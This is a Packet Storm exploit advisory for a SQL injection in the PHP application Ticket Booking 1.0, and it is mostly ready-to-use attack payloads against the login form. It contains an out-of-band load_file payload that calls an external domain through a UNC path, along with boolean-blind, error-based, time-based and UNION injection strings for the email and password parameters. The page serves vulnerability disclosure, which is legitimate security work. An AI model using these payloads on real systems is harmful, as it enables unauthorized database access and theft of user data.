Ticket Booking 1.0 SQL Injection

Ticket Booking 1.0 SQL Injection: Posted Dec 14, 2021; Authored by nu11secur1ty; Ticket Booking version 1.0 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | b7eaf0dd796e6b929ff99d0b8034ecc62fa7eca376cbcc212d5572c6ebdac267; Download | Favorite | View

Ticket Booking 1.0 SQL Injection

## Title: Ticket Booking 1.0 suffer from SQL - Injenction
## Author: nu11secur1ty
## Date: 12.14.2021
## Vendor: https://code-projects.org/ticket-booking-in-php-with-source-code/
## Software: https://code-projects.org/ticket-booking-in-php-with-source-code/

## Description:
The password parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\dl2edbuqvk9djxngyslxk9z7hynrbqzh25uslga.nu11secur1tyPenetrationTestingEngineer.net\\yba'))+'
was submitted in the password parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed. The attacker can be retrieving all
information from this system.

[+] Payload:

Parameter: email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: email=-9424' OR 1979=1979#&password=hacked' or
'4861'='4870&login_submit=

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: email=pwned@nu11secur1tyPenetrationTestingEngineer.net'
OR (SELECT 3647 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT
(ELT(3647=3647,1))),0x71716a7a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RnIV&password=hacked' or
'4861'='4870&login_submit=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=pwned@nu11secur1tyPenetrationTestingEngineer.net'
AND (SELECT 2804 FROM (SELECT(SLEEP(5)))urgo)-- taiV&password=hacked'
or '4861'='4870&login_submit=

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: email=pwned@nu11secur1tyPenetrationTestingEngineer.net'
UNION ALL SELECT
NULL,CONCAT(0x717a6b7a71,0x5379666f7a4b7256695768444c63617a724465514467724f4c59744a4d574a6d4c697974424d4c47,0x71716a7a71),NULL,NULL,NULL,NULL,NULL#&password=hacked'
or '4861'='4870&login_submit=

## Reproduce:
[href]()

## Proof and Exploit:
[href](https://streamable.com/vtr95i)


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Ticket Booking 1.0 SQL Injection

Ticket Booking 1.0 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Ticket Booking 1.0 SQL Injection

Share This

Ticket Booking 1.0 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems